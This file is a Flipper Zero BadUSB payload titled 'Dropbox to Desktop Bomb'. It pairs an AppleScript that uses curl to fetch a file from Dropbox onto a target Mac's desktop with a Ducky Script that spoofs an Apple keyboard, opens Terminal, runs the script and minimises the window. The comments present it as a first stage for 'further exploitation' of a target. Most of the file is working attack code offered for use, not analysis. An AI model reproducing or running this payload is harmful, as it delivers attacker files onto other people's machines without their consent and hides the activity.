Narsty
51 lines
1.7 KiB
Plaintext
51 lines
1.7 KiB
Plaintext
REM This script can be used to download files from dropbox to a target MacOs Desktop.
|
|
REM files downloaded to the desktop can be used to trigger more complex scripts for further exploitation
|
|
|
|
REM Author: Narsty
|
|
REM Title: Dropbox to Desktop Bomb
|
|
REM Version 1.0 MacOs
|
|
REM Category: Execution
|
|
|
|
|
|
REM Copy and paste the osascript/code (lines 19-28) into the Script editor App on your MacOs
|
|
REM Replace the "Your API Access token Here" (line 20) placeholder with your actual Dropbox API token.
|
|
REM Replace the "File Name" (line 22) placeholder with the name of the file you intend to download from dropbox
|
|
REM Replace the "Dropbox File Path" (line 21) placeholder with the path of the file you want to download from Dropbox
|
|
REM Save this script below as a Droptod.scpt file (Use Script Editor) to your/your targets desktop.
|
|
|
|
|
|
|
|
|
|
-- Dropbox API settings
|
|
set ACCESS_TOKEN to "Your API Access token Here"
|
|
set FILE_PATH to "Dropbox File Path"
|
|
set SAVE_PATH to POSIX path of (path to desktop folder) & "File Name"
|
|
|
|
-- Download file from Dropbox
|
|
do shell script "curl -X POST https://content.dropboxapi.com/2/files/download " & ¬
|
|
"--header \"Authorization: Bearer " & ACCESS_TOKEN & "\" " & ¬
|
|
"--header \"Dropbox-API-Arg: {\\\"path\\\": \\\"" & FILE_PATH & "\\\"}\" " & ¬
|
|
"--output \"" & SAVE_PATH & "\""
|
|
|
|
|
|
|
|
REM Final step is to save the below Ducky Script as a .txt file lines 36-50 (main Read.me has step by step directions)
|
|
REM and put the .txt file on your BADUSB flipper zero APP to execute the osascript through the terminal.
|
|
|
|
|
|
ID 05ac:021e Apple:Keyboard
|
|
DELAY 500
|
|
GUI SPACE
|
|
DELAY 500
|
|
STRING terminal
|
|
DELAY 500
|
|
ENTER
|
|
DELAY 1000
|
|
STRING cd ~/Desktop
|
|
ENTER
|
|
DELAY 500
|
|
STRING osascript Droptod.scpt
|
|
ENTER
|
|
DELAY 200
|
|
GUI m
|